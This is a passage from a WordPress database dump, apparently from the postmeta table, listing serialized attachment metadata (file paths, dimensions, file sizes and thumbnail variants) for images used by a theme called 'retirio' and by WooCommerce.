6494;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44612;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home1-03-1536x656.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:137413;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:76855;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31530;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-378x820.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51123;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70430;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-revslider-home1-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19055;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-600x256.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30108;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home1-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3575;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(166,1792,'_wp_attached_file','2022/06/bg-revslider-home2-01.jpg'),(167,1792,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:820;s:4:\"file\";s:33:\"2022/06/bg-revslider-home2-01.jpg\";s:8:\"filesize\";i:321311;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10467;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home2-01-1024x437.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93876;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5894;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55321;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home2-01-1536x656.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:195415;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103386;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40252;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-378x820.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:78173;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94023;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-revslider-home2-01-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20420;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-600x256.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35452;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-01-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3140;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(168,1793,'_wp_attached_file','2022/06/bg-revslider-home2-02.jpg'),(169,1793,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:820;s:4:\"file\";s:33:\"2022/06/bg-revslider-home2-02.jpg\";s:8:\"filesize\";i:377860;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11439;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home2-02-1024x437.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:105774;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7940;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60749;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home2-02-1536x656.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231905;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:129467;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50625;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-378x820.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:100552;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:108580;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-revslider-home2-02-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26371;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-600x256.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39301;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-02-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4090;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(170,1794,'_wp_attached_file','2022/06/bg-revslider-home2-03.jpg'),(171,1794,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:820;s:4:\"file\";s:33:\"2022/06/bg-revslider-home2-03.jpg\";s:8:\"filesize\";i:318478;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-300x128.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:128;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12745;}s:5:\"large\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home2-03-1024x437.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:437;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:107563;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7675;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-768x328.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:328;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65134;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:34:\"bg-revslider-home2-03-1536x656.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:656;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:212684;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:122659;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:49036;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-378x820.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:820;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:79084;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111911;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:33:\"bg-revslider-home2-03-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26511;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-600x256.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42411;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:33:\"bg-revslider-home2-03-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3863;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(172,1896,'_wp_attached_file','2022/06/background-get-interior.png'),(173,1896,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1491;s:6:\"height\";i:1936;s:4:\"file\";s:35:\"2022/06/background-get-interior.png\";s:8:\"filesize\";i:200253;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"background-get-interior-231x300.png\";s:5:\"width\";i:231;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16614;}s:5:\"large\";a:5:{s:4:\"file\";s:36:\"background-get-interior-789x1024.png\";s:5:\"width\";i:789;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:122972;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"background-get-interior-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7370;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"background-get-interior-768x997.png\";s:5:\"width\";i:768;s:6:\"height\";i:997;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:116916;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:37:\"background-get-interior-1183x1536.png\";s:5:\"width\";i:1183;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:238984;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:35:\"background-get-interior-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:98830;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:35:\"background-get-interior-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:40191;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:35:\"background-get-interior-378x824.png\";s:5:\"width\";i:378;s:6:\"height\";i:824;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:67956;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:35:\"background-get-interior-960x473.png\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84726;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"background-get-interior-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24123;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:35:\"background-get-interior-600x779.png\";s:5:\"width\";i:600;s:6:\"height\";i:779;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:78404;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"background-get-interior-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3642;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(175,1901,'_wp_attached_file','2022/06/01-test.png'),(176,1901,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:95;s:6:\"height\";i:110;s:4:\"file\";s:19:\"2022/06/01-test.png\";s:8:\"filesize\";i:2539;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"01-test-95x100.png\";s:5:\"width\";i:95;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2181;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(178,1903,'_wp_attached_file','2022/06/02-home1.png'),(179,1903,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:96;s:6:\"height\";i:109;s:4:\"file\";s:20:\"2022/06/02-home1.png\";s:8:\"filesize\";i:1812;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"02-home1-96x100.png\";s:5:\"width\";i:96;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1346;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(181,1904,'_wp_attached_file','2022/06/03-home1.png'),(182,1904,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:88;s:6:\"height\";i:109;s:4:\"file\";s:20:\"2022/06/03-home1.png\";s:8:\"filesize\";i:2031;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"03-home1-88x100.png\";s:5:\"width\";i:88;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1588;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(184,1905,'_wp_attached_file','2022/06/04-home1.png'),(185,1905,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:107;s:6:\"height\";i:108;s:4:\"file\";s:20:\"2022/06/04-home1.png\";s:8:\"filesize\";i:2400;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"04-home1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2204;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(187,1906,'_wp_attached_file','2022/06/05-home1.png'),(188,1906,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:105;s:6:\"height\";i:109;s:4:\"file\";s:20:\"2022/06/05-home1.png\";s:8:\"filesize\";i:2668;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"05-home1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2393;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(190,1907,'_wp_attached_file','2022/06/06-home1.png'),(191,1907,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:106;s:6:\"height\";i:108;s:4:\"file\";s:20:\"2022/06/06-home1.png\";s:8:\"filesize\";i:2520;s:5:\"sizes\";a:1:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"06-home1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2304;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193,1973,'_wp_attached_file','2022/06/bg-banner-home3.jpg'),(194,1973,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:720;s:4:\"file\";s:27:\"2022/06/bg-banner-home3.jpg\";s:8:\"filesize\";i:312839;s:5:\"sizes\";a:12:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-300x113.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:113;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7874;}s:5:\"large\";a:5:{s:4:\"file\";s:28:\"bg-banner-home3-1024x384.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67228;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5166;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-768x288.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38019;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:28:\"bg-banner-home3-1536x576.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154649;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-768x660.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92669;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-390x473.jpg\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:33858;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-378x720.jpg\";s:5:\"width\";i:378;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:61346;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-960x473.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:473;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82690;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"bg-banner-home3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16692;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-600x225.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24593;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"bg-banner-home3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(196,2075,'_wp_attached_file','2022/06/aboutbg.png'),(197,2075,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:944;s:6:\"height\";i:735;s:4:\"file\";s:19:\"2022/06/aboutbg.png\";s:8:\"filesize\";i:72063;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"aboutbg-300x234.png\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10864;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"aboutbg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3932;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"aboutbg-768x598.png\";s:5:\"width\";i:768;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48940;}s:17:\"retirio_thumbnail\";a:5:{s:4:\"file\";s:19:\"aboutbg-768x660.png\";s:5:\"width\";i:768;s:6:\"height\";i:660;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52859;}s:25:\"retirio_project_thumbnail\";a:5:{s:4:\"file\";s:19:\"aboutbg-390x473.png\";s:5:\"width\";i:390;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:20353;}s:27:\"retirio_project_thumbnail_1\";a:5:{s:4:\"file\";s:19:\"aboutbg-378x735.png\";s:5:\"width\";i:378;s:6:\"height\";i:735;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18885;}s:23:\"retirio_project_masonry\";a:5:{s:4:\"file\";s:19:\"aboutbg-944x473.png\";s:5:\"width\";i:944;s:6:\"height\";i:473;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:44766;}s:21:\"woocommerce_thumb